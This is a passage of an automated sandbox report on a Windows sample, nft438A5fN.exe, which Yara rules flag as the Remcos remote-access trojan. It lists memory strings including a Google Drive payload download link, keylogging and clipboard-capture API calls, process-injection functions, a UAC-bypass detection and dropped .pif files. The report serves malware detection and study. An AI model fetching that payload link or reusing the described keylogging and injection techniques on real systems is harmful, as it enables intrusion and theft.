Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/dow
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/t
Source: nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,00000000

11_2_0320A2F3

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0320B749

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		11_2_032168FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		21_2_02E968FC

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0320B749

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_0320A41B

Yara detected Keylogger Generic

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321CA73 SystemParametersInfoW,		11_2_0321CA73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9CA73 SystemParametersInfoW,		21_2_02E9CA73

System Summary

Malicious sample detected (through community Yara rule)

Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8730 NtQueueApcThread,	0_2_02CA8730
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7A2C NtAllocateVirtualMemory,	0_2_02CA7A2C
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02CADC8C
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CADC04
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7D78 NtWriteVirtualMemory,	0_2_02CA7D78
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02CADD70
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8D6E GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02CA8D6E
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8D70 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02CA8D70
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7A2A NtAllocateVirtualMemory,	0_2_02CA7A2A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CADBB0
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	7_2_00054823
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	7_2_0005643A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	7_2_00067460
Source: C:\Users\Public\alpha.pif	Code function: 7_2_000564CA NtQueryInformationToken,	7_2_000564CA
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056500 NtQueryInformationToken,NtQueryInformationToken,	7_2_00056500
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006A135 NtSetInformationFile,	7_2_0006A135
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	7_2_0006C1FA
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	7_2_00044E3B
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	7_2_00054759
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	15_2_00054823
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	15_2_0005643A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	15_2_00067460
Source: C:\Users\Public\alpha.pif	Code function: 15_2_000564CA NtQueryInformationToken,	15_2_000564CA
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056500 NtQueryInformationToken,NtQueryInformationToken,	15_2_00056500
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006A135 NtSetInformationFile,	15_2_0006A135
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	15_2_0006C1FA
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	15_2_00044E3B
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	15_2_00054759
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C58730 NtQueueApcThread,	19_2_02C58730
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57A2C NtAllocateVirtualMemory,	19_2_02C57A2C
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C5DD70 NtOpenFile,NtReadFile,	19_2_02C5DD70
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57D78 NtWriteVirtualMemory,	19_2_02C57D78
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57A2A NtAllocateVirtualMemory,	19_2_02C57A2A

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.pif

Code function: 7_2_00044C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

7_2_00044C10

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA8788 CreateProcessAsUserW,

0_2_02CA8788

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,		11_2_032167EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,		21_2_02E967EF

Creates files inside the system directory

Source: C:\Users\Public\alpha.pif	File created: C:\Windows			Jump to behavior
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64			Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.pif

File deleted: C:\Windows \SysWOW64

Detected potential crypto function

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C920C4	0_2_02C920C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3671B	0_2_02D3671B
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3E42F	0_2_02D3E42F
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4E5FA	0_2_02D4E5FA
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3E9BE	0_2_02D3E9BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6A93B	0_2_02D6A93B
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D64FD9	0_2_02D64FD9
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4AF67	0_2_02D4AF67
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3F067	0_2_02D3F067
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3F1D0	0_2_02D3F1D0
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D35183	0_2_02D35183
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D556AC	0_2_02D556AC
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6B769	0_2_02D6B769
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5547D	0_2_02D5547D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D2B595	0_2_02D2B595
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D55B38	0_2_02D55B38
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D558DB	0_2_02D558DB
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5D800	0_2_02D5D800
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4FD80	0_2_02D4FD80
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004540A	7_2_0004540A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00044C10	7_2_00044C10
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054875	7_2_00054875
Source: C:\Users\Public\alpha.pif	Code function: 7_2_000474B1	7_2_000474B1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00049144	7_2_00049144
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006695A	7_2_0006695A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00064191	7_2_00064191
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004EE03	7_2_0004EE03
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00047A34	7_2_00047A34
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00046E57	7_2_00046E57
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004D660	7_2_0004D660
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00055A86	7_2_00055A86
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006769E	7_2_0006769E
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00053EB3	7_2_00053EB3
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00046B20	7_2_00046B20
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050740	7_2_00050740
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050BF0	7_2_00050BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E34B	11_2_0323E34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032533AB	11_2_032533AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03246270	11_2_03246270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E11C	11_2_0323E11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321F18B	11_2_0321F18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032381E8	11_2_032381E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032541D9	11_2_032541D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03214005	11_2_03214005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323706A	11_2_0323706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03238768	11_2_03238768
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032387F0	11_2_032387F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03237566	11_2_03237566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E5A8	11_2_0323E5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0322742E	11_2_0322742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321DBF3	11_2_0321DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324DA49	11_2_0324DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03227AD7	11_2_03227AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323797E	11_2_0323797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032339D7	11_2_032339D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03226E9F	11_2_03226E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03235EEB	11_2_03235EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323DEED	11_2_0323DEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03237DB3	11_2_03237DB3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03227C40	11_2_03227C40
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004540A	15_2_0004540A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00044C10	15_2_00044C10
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054875	15_2_00054875
Source: C:\Users\Public\alpha.pif	Code function: 15_2_000474B1	15_2_000474B1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00049144	15_2_00049144
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006695A	15_2_0006695A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00064191	15_2_00064191
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004EE03	15_2_0004EE03
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00047A34	15_2_00047A34
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00046E57	15_2_00046E57
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004D660	15_2_0004D660
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00055A86	15_2_00055A86
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006769E	15_2_0006769E
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00053EB3	15_2_00053EB3
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00046B20	15_2_00046B20
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050740	15_2_00050740
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050BF0	15_2_00050BF0
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F1E26	16_2_000F1E26
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C420C4	19_2_02C420C4
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C4C95F	19_2_02C4C95F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EC6270	21_2_02EC6270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ED33AB	21_2_02ED33AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE34B	21_2_02EBE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB706A	21_2_02EB706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E94005	21_2_02E94005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB81E8	21_2_02EB81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ED41D9	21_2_02ED41D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9F18B	21_2_02E9F18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE11C	21_2_02EBE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB87F0	21_2_02EB87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA742E	21_2_02EA742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBE5A8	21_2_02EBE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB7566	21_2_02EB7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA7AD7	21_2_02EA7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECDA49	21_2_02ECDA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9DBF3	21_2_02E9DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB39D7	21_2_02EB39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB797E	21_2_02EB797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB5EEB	21_2_02EB5EEB
